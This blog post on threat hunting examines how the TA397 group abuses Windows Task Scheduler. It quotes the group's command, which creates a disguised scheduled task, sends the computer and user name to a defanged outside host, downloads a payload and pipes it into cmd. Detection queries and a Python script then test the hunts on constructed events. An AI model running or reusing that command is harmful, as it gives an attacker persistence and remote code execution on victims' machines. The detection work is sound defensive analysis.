158. Here's How TA397 Abuses Task Scheduler
Hello everyone!
Proofpoint, in collaboration with Threatray, released a report on TA397 activities. Threat researchers assess that it's a state-sponsored adversary with a focus on intelligence gathering.
The threat actors actively abused Task Scheduler. It's a very common technique, but the command seemed interesting to me:
"C:\\Windows\\System32\\conhost.exe" --headless cmd /c ping localhost > nul & schtasks /create /tn "EdgeTaskUI" /f /sc minute /mo 16 /tr "conhost --headless powershell -WindowStyle Minimized irm "woodstocktutors[.]com/jbc.php?fv=$env:COMPUTERNAME*$env:USERNAME" -OutFile "C:\\Users\\public\\kwe.cc"; Get-Content "C:\\Users\\public\\kwe.cc" | cmd"
First of all, the adversary extensively uses conhost.exe in "headless" mode. I'm sure you already have this hunt in your library:
event_type: "processcreatewin"
AND
proc_file_name: "conhost.exe"
AND
cmdline: "headless"
But more interesting is how the threat actors abused PowerShell. As you can see in the script, it downloads the payload from a remote server, reads its contents and pipes it to Windows Command Shell. And yes, we can use it for hunting:
event_type: "processcreatewin"
AND
proc_file_name: "powershell.exe"
AND
cmdline: ("get-content" AND "cmd")
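To show how both hunts above behave on real-looking telemetry, here is an added Python example (written for this post, not Proofpoint's or Threatray's tooling). It evaluates the conhost "headless" hunt and the PowerShell Get-Content-to-cmd hunt over constructed process-creation events, and pulls the task name and schedule out of the schtasks command so an analyst can see what the task would do. The field names event_type, proc_file_name and cmdline mirror the queries above; the sample events are constructed, including benign look-alikes to show that term matching on word boundaries keeps false positives down.

```python
"""Evaluate the two TA397-style hunts over constructed process-creation events.

Added illustrative code for this post; not Proofpoint's or Threatray's tooling.
Field names follow the hunt queries above. All sample events are constructed.
"""
import re

# Constructed sample events (not real telemetry). Events 0 and 1 mirror the
# reported command; the rest are benign look-alikes that should not fire.
SAMPLE_EVENTS = [
    {"event_type": "processcreatewin", "proc_file_name": "conhost.exe",
     "cmdline": r'"C:\\Windows\\System32\\conhost.exe" --headless cmd /c ping localhost > nul & '
                r'schtasks /create /tn "EdgeTaskUI" /f /sc minute /mo 16 /tr "conhost --headless '
                r'powershell -WindowStyle Minimized irm "woodstocktutors[.]com/jbc.php?'
                r'fv=$env:COMPUTERNAME*$env:USERNAME" -OutFile "C:\\Users\\public\\kwe.cc"; '
                r'Get-Content "C:\\Users\\public\\kwe.cc" | cmd"'},
    # What the scheduled task spawns once it fires: powershell.exe with the /tr payload.
    {"event_type": "processcreatewin", "proc_file_name": "powershell.exe",
     "cmdline": r'powershell -WindowStyle Minimized irm "woodstocktutors[.]com/jbc.php?'
                r'fv=$env:COMPUTERNAME*$env:USERNAME" -OutFile "C:\\Users\\public\\kwe.cc"; '
                r'Get-Content "C:\\Users\\public\\kwe.cc" | cmd'},
    # Benign: the normal conhost launch that accompanies any console process.
    {"event_type": "processcreatewin", "proc_file_name": "conhost.exe",
     "cmdline": r'\??\C:\Windows\system32\conhost.exe 0x4'},
    # Benign: Get-Content used for log review, nothing piped to cmd.
    {"event_type": "processcreatewin", "proc_file_name": "powershell.exe",
     "cmdline": r'powershell Get-Content C:\logs\app.log | Select-String error'},
    # Wrong event type: both hunts are scoped to process creation only.
    {"event_type": "filecreatewin", "proc_file_name": "powershell.exe",
     "cmdline": r'powershell Get-Content x | cmd'},
]

# The two hunts from the post, expressed as process name plus required cmdline terms.
HUNTS = {
    "conhost_headless": {"proc_file_name": "conhost.exe", "terms": ["headless"]},
    "powershell_getcontent_to_cmd": {"proc_file_name": "powershell.exe",
                                     "terms": ["get-content", "cmd"]},
}


def _has_term(cmdline, term):
    """Case-insensitive whole-token match, so 'cmd' does not hit 'cmdlet'."""
    return re.search(r"\b" + re.escape(term) + r"\b", cmdline, re.IGNORECASE) is not None


def matches(event, hunt):
    """True when the event satisfies every AND clause of the hunt."""
    if event.get("event_type") != "processcreatewin":
        return False
    if event.get("proc_file_name", "").lower() != hunt["proc_file_name"]:
        return False
    cmdline = event.get("cmdline", "")
    return all(_has_term(cmdline, term) for term in hunt["terms"])


def run_hunts(events, hunts=HUNTS):
    """Return (event index, hunt name) pairs for every event that fires a hunt."""
    return [(idx, name) for idx, ev in enumerate(events)
            for name, hunt in hunts.items() if matches(ev, hunt)]


# Enrichment: pull task name (/tn), schedule type (/sc) and modifier (/mo) out of
# a schtasks command line so the alert shows what the persistence actually does.
_SCHTASKS_ARG = re.compile(r'/(tn|sc|mo)\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)


def schtasks_fields(cmdline):
    if re.search(r"\bschtasks\b", cmdline, re.IGNORECASE) is None:
        return {}
    fields = {}
    for m in _SCHTASKS_ARG.finditer(cmdline):
        fields[m.group(1).lower()] = m.group(2) if m.group(2) is not None else m.group(3)
    return fields


if __name__ == "__main__":
    for idx, name in run_hunts(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"[{name}] {ev['proc_file_name']}: {ev['cmdline'][:80]}...")
        print("  schtasks:", schtasks_fields(ev["cmdline"]))
```

Only events 0 and 1 fire; the enrichment on event 0 reports the task "EdgeTaskUI" running every 16 minutes. Note that the second hunt only catches the task once it has actually executed (powershell.exe is the process carrying Get-Content and cmd); the conhost hunt catches the initial setup command as well.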
See you tomorrow!